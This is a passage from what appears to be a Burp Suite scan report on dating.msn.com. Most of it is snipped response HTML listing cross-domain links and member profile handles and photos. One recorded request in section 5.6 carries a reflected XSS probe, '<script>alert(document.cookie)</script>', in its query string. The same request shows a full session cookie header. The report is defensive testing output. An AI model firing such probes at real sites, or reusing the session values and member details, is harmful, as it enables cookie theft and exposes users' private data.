<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=94dK8llJn%2bwYlf6koQpDjQ%3d%3d&amp;Handle=UKUSMS09&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/54/15/70265415A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=4RUSQto9KahfcRFd1f5Z9g%3d%3d&amp;Handle=kirkie4me&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/69/84/35786984A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=GZyk85fw9KEZRyAOjI5aBg%3d%3d&amp;Handle=cburn020&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/16/97/99401697B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=18GnOLDXkC90eYj6gGWfKw%3d%3d&amp;Handle=luvelee26&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/78/70/99397870A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=BxO1zjrJ5VbHS7btLaOZsw%3d%3d&amp;Handle=SaraElizabethXO&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/49/44/99354944A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0QgFiCGyqgmohVj3aSH6TA%3d%3d&amp;Handle=BLAKROSE30&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/42/14/99034214A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=TnB4B4A6gActfGVGlip91Q%3d%3d&amp;Handle=SimplyAnna1986&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/79/22/99407922A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=W3TFcvfhvplQN4C5Td01mQ%3d%3d&amp;Handle=Risingsunset238&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/71/68/99407168A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=4vKHV5k%2fNf3UrERGTfI7LQ%3d%3d&amp;Handle=JRob1nson&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/69/72/99406972A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=zsyUoGhIOCCe44gR%2fRRCUQ%3d%3d&amp;Handle=mindy101580&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/60/59/99406059A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2bjux%2fk7i%2bfirwZMvWMYV7w%3d%3d&amp;Handle=nlowry1532&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/50/21/99405021A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=3jdX5pV5w46i4K%2b%2f4SG0iA%3d%3d&amp;Handle=Champagne0185&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/49/03/99404903B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=idghMcavLmT7kv%2fnnfjilg%3d%3d&amp;Handle=DemiC55&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/15/80/99391580A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=CKeE6OZ2WFd68rNwGhwnHA%3d%3d&amp;Handle=SexyOdessa&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/80/36/99388036B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0JEkYsSThnSQlifE5y0XXQ%3d%3d&amp;Handle=NurseNem01&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/50/67/99385067A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=UeGK6cOVaMfAugqoXQmTSA%3d%3d&amp;Handle=cabapc&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/11/09/99381109B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=4jU%2bdWbf%2b0ArvN94mRGYWA%3d%3d&amp;Handle=Fulloflife5157&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/50/38/99375038A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=3K%2bp81h0NGqZUibS3EsACQ%3d%3d&amp;Handle=aihsanal&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/59/13/97745913A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=nFv5kpwWhpZXzBhY%2faJkSQ%3d%3d&amp;Handle=ss1985rb&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/95/80/99119580D.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=KBiQ6f3oiF%2bvd0EkH8q%2bFg%3d%3d&amp;Handle=ClassyOne804&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/33/27/90553327A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=nly0UtLW7yXNRhAMr7N8cQ%3d%3d&amp;Handle=ObliviousM&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/49/65/99344965A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=q%2bW%2biC%2f8I88ESoBwwu9TKQ%3d%3d&amp;Handle=LonelyGyrl29&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/40/52/99344052A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=I0xukWp799kl5%2bSPmmWSjg%3d%3d&amp;Handle=4584bonita1&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/91/65/99339165A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=APx1F%2fU%2fGNyI1WatARmhZg%3d%3d&amp;Handle=christina78here&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/22/46/99332246A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

5.6. http://dating.msn.com/search/searchSubmit.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/searchSubmit.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/searchSubmit.aspx?8f518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1add0d48d=1&ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2 HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=1; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: msnc=2; expires=Thu, 17-Feb-2011 02:09:46 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:09:46 GMT; path=/
Date: Sat, 12 Feb 2011 02:09:47 GMT
Content-Length: 174766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/ui.fbconnect.js"></script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/ggs1.js"></script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/currentURL.js"></script>
...[SNIP]...
</script>


<link href="http://cp.match.com/cppp/floatingreg/profile/css/default.css" id="baseFloatingRegStyle" rel="stylesheet" type="text/css" />


<div id="overlay" class="modal_overlay">
...[SNIP]...
<div class="arrow"><img src="http://cp.match.com/cppp/floatingreg/images/46320arrow.png" width="36" height="60" /></div>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/floatingreg/images/46320btnBegin.gif" alt="Begin Now &raquo;" width="198" height="55" class="btnProgressive p1" style="cursor:pointer;" />
                   <img src="http://cp.match.com/cppp/floatingreg/images/46320btnContinue.gif" alt="Continue &raquo;" width="198" height="55" class="btnRegister p2" style="cursor:pointer;" />
                   <input name="countryCode" type="hidden" id="countryCode" value="1" />
...[SNIP]...
<div id="pnlButton">
                   <img src="http://cp.match.com/cppp/floatingreg/images/46320btnContinue.gif" alt="Continue &raquo;" width="198" height="55" class="btnLogin" />
                   <p id="forgotPassword">
...[SNIP]...
<div id="facebook-modal" style="position:absolute" class="facebook-container facebook-populate sys-template" behavior="MatchCore.UI.Site.ModalDialog" meta="{autoCenter : true}">
<link href="http://cp.match.com/cppp/floatingreg/facebookFloatingReg.css" rel="stylesheet" type="text/css" />
   <div class="hd">
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/cppp/floatingreg/images/beginNowBtn.gif" alt="Continue" width="144" height="29" border="0" class="btnRegisterBehav" style="cursor:pointer" /></div>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/cppp/floatingreg/images/signInBtn.gif" alt="Continue" width="144" height="29" border="0" class="btnLoginBehav" style="cursor:pointer" /></div>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/5480.iac.match/f/' + adzone + ';sz=' + adSize + ';tile=1;bid=1014875;city_ps=dallas;log=0;gp=1;subid=2;subid=b5;pn=1;ubid=0;s=mt;pos=bom;ord=' + ord + '?" target="_blank">
<img src="http://ad.doubleclick.net/ad/5480.iac.match/f/' + adzone + ';sz=' + adSize + ';tile=1;bid=1014875;city_ps=dallas;log=0;gp=1;subid=2;subid=b5;pn=1;ubid=0;s=mt;pos=bom;ord=' + ord + '?" width="187" height="93" border="0" alt="">
</a>
...[SNIP]...
</span>
               
                <img id="ctl00_workarea_ctl00_ctl00_SearchResultsPage1_ctl00_GalleryViewBtn_disabled" border="0" src="http://images.match.com/match/search/S09/galleryViewBtnActive.gif" alt="Gallery View" style="height:19px;width:21px;border-width:0px;" />
                <input type="image" name="ctl00$workarea$ctl00$ctl00$SearchResultsPage1$ctl00$DetailViewBtn" id="ctl00_workarea_ctl00_ctl00_SearchResultsPage1_ctl00_DetailViewBtn" border="0" src="http://image
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=EcZwQh8RQVUe0aqvDFKJuA==&amp;handle=sado2012&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/28/44/99292844D.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=pQ2fHxV79q002jBEmCHR1w==&amp;handle=Fonz11&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/51/29/99285129M.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=uSSsCOEcABMHzhMDMiNFLg==&amp;handle=bachelor033&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/89/35/99328935C.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=FDapXNxbmaqM3v5HQnq8Ag==&amp;handle=bham3434&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/35/17/99403517A.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=gZdXE7tBUaakDVG5itn3ug==&amp;handle=Sammie_919&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/78/76/99497876A.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=8atW63X6Hb64POgpxQjToA==&amp;handle=BachateroConsabo&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=/jQbfrputXZvTEsKwZeFhg==&amp;handle=luveysexyman&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
